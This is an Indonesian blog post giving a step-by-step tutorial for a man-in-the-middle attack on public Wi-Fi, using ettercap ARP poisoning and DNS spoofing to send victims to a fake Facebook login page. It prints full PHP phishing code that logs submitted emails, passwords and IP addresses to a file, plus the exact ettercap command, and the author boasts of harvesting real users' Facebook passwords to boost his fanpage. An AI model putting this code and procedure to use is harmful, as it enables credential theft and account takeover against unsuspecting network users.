Selasa, 23 Oktober 2012

(share) dns_spoof use ettercap


hey guys Big Grin apa kabar , yap xsan-lahci yang cool ini akan memberikan sebuah tutorial dns_spoof menggunakan ettercap

hmm dns_spoof? yap salah satu teknik MITM atau Man In The Middle Attack ini sangatlah saya gemari jika berada di hotspot area wakakka sebelum melakukan dns_spoof tentunya kita harus melakukan sebuah teknik arp poisoning atau peracunan jaringan , dns_spoofing ini bisa di katakan sebuah penyesatan , kali ini saya melakukan sebuah penyesatan pada jaringan wifi, hotspot area yang tidak terlalu secure tentu masih bisa di lakukan arp poisoning , dns spoofing sampai sniffing


seperti inilah kronologi sebuah dns_spoof yang di kombinasikan dengan arp poisoning


http://xsanlahci.files.wordpress.com/2012/09/1alocalarppoisoning1.jpg?w=627


yap saya jelaskan sedikit, attacker melakukan peracunan jaringan pada gateway, sehingga korban yang seharusnya login pada server tujuan disini adalah facebook.com , malah masuk pada fakelogin attacker yg sudah di siapkan. ya jadi attacker ada di tengah antara korban dan gateway yg telah di racuni.

langsung aja deh pertama buka sebuah halaman login yang akan anda jadikan fakelogin/phising


disini saya menggunakan facebook,save di /var/www/ dengan nama index.html


lalu buka console dan edit pada bagian action perhatikan gambar di bawah ini


root@xsan-lahci :~# geany /var/www/index.html


http://xsanlahci.files.wordpress.com/2012/09/geany1.png?w=1024&h=596


bagi yang belum menginstall geany bisa langsung gunakan perintah

apt-get install geany


oke perhatikan kolom di atas disitu kita mencari tulisan action jika sudah ketemu langsung saja ganti isinya dengan tulisan seperti gambar di atas yaitu post.php yap agar ketika si korban login maka catatan passwordnya akan terekam pada logs.txt yang ada di post.php


save dulu ya tentunya isi codingan post.php dibawah ini


Code: (Select All)
<?php

$file = "logs.txt";

$username = $_POST['email'];

$password = $_POST['pass'];

$ip = $_SERVER['REMOTE_ADDR'];

$today = date("F j, Y, g:i a");



$handle = fopen($file, 'a');

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "Email: ");

fwrite($handle, "$username");

fwrite($handle, "\n");

fwrite($handle, "Password: ");

fwrite($handle, "$password");

fwrite($handle, "\n");

fwrite($handle, "IP Address: ");

fwrite($handle, "$ip");

fwrite($handle, "\n");

fwrite($handle, "Date Submitted: ");

fwrite($handle, "$today");

fwrite($handle, "\n");

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "\n");

fclose($handle);

echo "<script LANGUAGE=\"JavaScript\">

<!--

window.location=\"https://login.facebook.com/login.php?login_attempt=1\";

// -->

</script>";

?>

save dengan nama post.php dan di simpan di /var/www


next kedua edit isi dari etter.dns seperti berikut ini

gunakan editor kesukaan anda,disini saya menggunakan nano

root@xsan-lahci :~# nano /usr/local/share/ettercap/etter.dns


http://xsanlahci.files.wordpress.com/2012/09/dns_spoof.png?w=1024&h=596


perhatikan gambar di atas, ada tulisan facebook.com yap saya menggunakan fakelogin facebook dan perhatikan no ip tersebut haha jangan lupa isikan dengan ip anda

ok langsung save and exit


dan jalankan apache2 anda seperti ini


root@xsan-lahci:~# /etc/init.d/apache2 start


langsung deh ente jalanin ettercapnya dengan perintah


ettercap -T -q -i (interface) -P dns_spoof (plugin dns_spoofing) -M ARP (arp poisoning) // // ( peracunan 1 jaringan)


root@xsan-lahci :~# ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //


saya menggunakan wlan0 karena memanfaatkan wifi kalo pake kabel lan eth0 kalo pake modem usb ya gabisa lah wakakak


http://xsanlahci.files.wordpress.com/2012/09/victim11.png?w=1024&h=246


eh dapet nih coy password fb hahaha lumayan buat nambah donasi like fanpage gua wakakak facebook.com/XsanLahci eeh ga sampe situ aja , coba perhatikan gambar di atas kolom 1 ada tulisan dns_spoof: [www.facebook.com spoofed to bla bla keterangan itu berarti ada orang yang lagi cb akses fb hahaha bener kan ga lama nongol tuh dibawahya USER : sebut saja bunga dengan password alaynya yg tentu percuma mau di bikin password alay gmn juga tetep aja terbaca jelas kalo pake teknik dns_spoofing ini hahahaha

eeeh dapet lagi pemirsa semua terekan dengan indah di log.txt gua nih gambarnya bro


http://xsanlahci.files.wordpress.com/2012/09/log.png?w=1024&h=621


oke semua tutorial ini harap digunakan dengan bijaksana jangan coba coba untuk melakukan hal jahat kecuali like fanpage fb gua wakakakak

note : TS tidak bertanggung jawab atas kegiatan jahat yg diperaktekan user akibat membaca tutorial ini hahahaha

Tidak ada komentar:

Posting Komentar